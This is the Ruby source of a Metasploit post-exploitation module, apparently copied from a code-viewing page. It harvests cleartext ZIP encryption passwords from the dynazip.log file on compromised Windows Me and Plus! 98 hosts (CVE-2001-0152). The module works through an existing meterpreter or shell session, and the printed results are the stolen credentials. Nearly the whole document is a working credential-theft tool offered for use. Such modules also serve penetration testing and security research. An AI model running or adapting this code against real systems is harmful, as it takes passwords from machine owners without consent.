Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Auxiliary::Report
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Windows Gather DynaZIP Saved Password Extraction',
15
        'Description' => %q{
16
          This module extracts clear text credentials from dynazip.log.
17
          The log file contains passwords used to encrypt compressed zip
18
          files in Microsoft Plus! 98 and Windows Me.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => ['bcoles'],
22
        'References' => [
23
          ['CVE', '2001-0152'],
24
          ['MSB', 'MS01-019'],
25
          ['PACKETSTORM', '24543'],
26
          ['URL', 'https://support.microsoft.com/en-us/kb/265131']
27
        ],
28
        'DisclosureDate' => '2001-03-27',
29
        'Platform' => ['win'],
30
        'SessionTypes' => ['meterpreter', 'shell']
31
      )
32
    )
33
  end
34

35
  def run
36
    creds = []
37

38
    log_path = "#{get_env('%WINDIR%')}\\dynazip.log"
39

40
    unless file?(log_path)
41
      print_error("#{log_path} not found")
42
      return
43
    end
44

45
    print_good("Found DynaZip log file: #{log_path}")
46

47
    begin
48
      log_data = read_file(log_path)
49
    rescue EOFError
50
      print_error('Log file is empty')
51
      return
52
    end
53

54
    vprint_status("Processing log file (#{log_data.length} bytes)")
55

56
    log_data.split('- DynaZIP ZIP Diagnostic Log -').each do |log|
57
      if log =~ /^lpszZIPFile: 0x[0-9a-f]+\s*?^(.+)\r\n/
58
        zip_path = ::Regexp.last_match(1)
59
      else
60
        next
61
      end
62

63
      vprint_status("Processing log entry for #{zip_path}")
64

65
      # The lpszEncryptCode appears to always be 0x712185d4 however
66
      # we use a hex regex pattern, just in case.
67
      # The line following the lpszEncryptCode contains the password.
68
      passwd = log.scan(/^lpszEncryptCode: 0x[0-9a-f]+\s*?^(.+)?\r\n/).flatten.first
69

70
      # In the event that the user selected a blank encryption password
71
      # the ZIP file is not encrypted, however an empty line is written
72
      # to the log file.
73
      if passwd.to_s.eql?('')
74
        vprint_status('Did not find a password')
75
        next
76
      end
77

78
      print_good("File: '#{zip_path}' -- Password: '#{passwd}'")
79
      creds << [zip_path, passwd]
80
    end
81

82
    if creds.empty?
83
      print_error('No passwords were found in the log file')
84
      return
85
    end
86

87
    table = Rex::Text::Table.new(
88
      'Header' => 'ZIP Passwords',
89
      'Indent' => 0,
90
      'SortIndex' => 0,
91
      'Columns' => ['File Path', 'Password']
92
    )
93
    creds.each { |c| table << c }
94
    print_line
95
    print_line(table.to_s)
96
  end
97
end
98

99